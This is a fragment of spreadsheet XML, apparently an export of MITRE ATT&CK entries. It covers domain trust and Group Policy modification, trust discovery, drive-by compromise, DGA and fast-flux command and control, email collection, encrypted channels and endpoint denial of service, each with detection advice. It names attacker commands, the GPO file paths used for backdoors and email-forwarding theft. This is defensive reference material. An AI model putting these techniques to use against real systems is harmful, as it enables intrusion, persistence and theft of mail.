  </si>
  <si>
    <t>07 March 2019</t>
  </si>
  <si>
    <t>It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)
Consider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)</t>
  </si>
  <si>
    <t>Azure AD, Windows</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Deletion, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>File system access controls, System access controls</t>
  </si>
  <si>
    <t>T1484.002</t>
  </si>
  <si>
    <t>Domain Policy Modification: Domain Trust Modification</t>
  </si>
  <si>
    <t>Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.
Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484/002</t>
  </si>
  <si>
    <t>Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)
Monitor for PowerShell commands such as: &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name"&lt;/code&gt;, or &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain&lt;/code&gt;.(Citation: Microsoft - Update or Repair Federated domain)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender</t>
  </si>
  <si>
    <t>T1484.001</t>
  </si>
  <si>
    <t>Domain Policy Modification: Group Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path &lt;code&gt;\\&amp;lt;DOMAIN&amp;gt;\SYSVOL\&amp;lt;DOMAIN&amp;gt;\Policies\&lt;/code&gt;.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) 
Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.
Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)
For example, publicly available scripts such as &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml&lt;/code&gt;.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf&lt;/code&gt;, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484/001</t>
  </si>
  <si>
    <t>It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
* Event ID 5136 - A directory service object was modified
* Event ID 5137 - A directory service object was created
* Event ID 5138 - A directory service object was undeleted
* Event ID 5139 - A directory service object was moved
* Event ID 5141 - A directory service object was deleted
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).</t>
  </si>
  <si>
    <t>Itamar Mizrahi, Cymptom; Tristan Bennett, Seamless Intelligence</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</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</si>
  <si>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domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1482</t>
  </si>
  <si>
    <t>17 September 2020</t>
  </si>
  <si>
    <t xml:space="preserve">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such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)
</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Dave Westgard; Elia Florio, Microsoft; Mnemonic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Drive-by Compromise</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</si>
  <si>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Token](https://attack.mitre.org/techniques/T1550/001).
Multiple ways of delivering exploit code to a browser exist, including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
* Malicious ads are paid for and served through legitimate ad providers.
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.
Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1189</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser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</si>
  <si>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Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Dynamic Resolution</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</si>
  <si>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
Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568</t>
  </si>
  <si>
    <t>10 March 2020</t>
  </si>
  <si>
    <t>Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Chris Roffe</t>
  </si>
  <si>
    <t>T1568.003</t>
  </si>
  <si>
    <t>Dynamic Resolution: DNS Calculation</t>
  </si>
  <si>
    <t>Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/003</t>
  </si>
  <si>
    <t>11 March 2020</t>
  </si>
  <si>
    <t>Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.</t>
  </si>
  <si>
    <t>T1568.002</t>
  </si>
  <si>
    <t>Dynamic Resolution: Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/002</t>
  </si>
  <si>
    <t>Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)</t>
  </si>
  <si>
    <t>Barry Shteiman, Exabeam; Ryan Benson, Exabeam; Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Dynamic Resolution: Fast Flux DNS</t>
  </si>
  <si>
    <t>Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)
In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/001</t>
  </si>
  <si>
    <t>In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
Monitor processes and command-line arguments for actions that could be taken to gather local email files.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Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt; parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Collection: Email Forwarding Rule</t>
  </si>
  <si>
    <t>Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Similarly, Google Workspace users or administrators can set up mail forwarding rules via the Google Workspace web interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) 
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/003</t>
  </si>
  <si>
    <t>19 February 2020</t>
  </si>
  <si>
    <t>Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content</t>
  </si>
  <si>
    <t>T1114.001</t>
  </si>
  <si>
    <t>Email Collection: Local Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\&lt;username&gt;\Documents\Outlook Files` or `C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files.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</si>
  <si>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T1114.002</t>
  </si>
  <si>
    <t>Email Collection: Remote Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/002</t>
  </si>
  <si>
    <t>Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>Adversaries may employ a known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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573</t>
  </si>
  <si>
    <t>16 March 2020</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)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</si>
  <si>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T1573.002</t>
  </si>
  <si>
    <t>Encrypted Channel: Asymmetric Cryptography</t>
  </si>
  <si>
    <t>Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/002</t>
  </si>
  <si>
    <t>T1573.001</t>
  </si>
  <si>
    <t>Encrypted Channel: Symmetric Cryptography</t>
  </si>
  <si>
    <t>Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/001</t>
  </si>
  <si>
    <t>With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.
In general,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</si>
  <si>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T1499</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t xml:space="preserve">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purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform DoS attacks against endpoint resources,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Botnets are commonly used to conduct DDoS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DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)
For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Application Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/003</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Application or System Exploitation</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/004</t>
  </si>
  <si>
    <t>Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.
Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)
ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/001</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Service Exhaustion Flood</t>
  </si>
  <si>
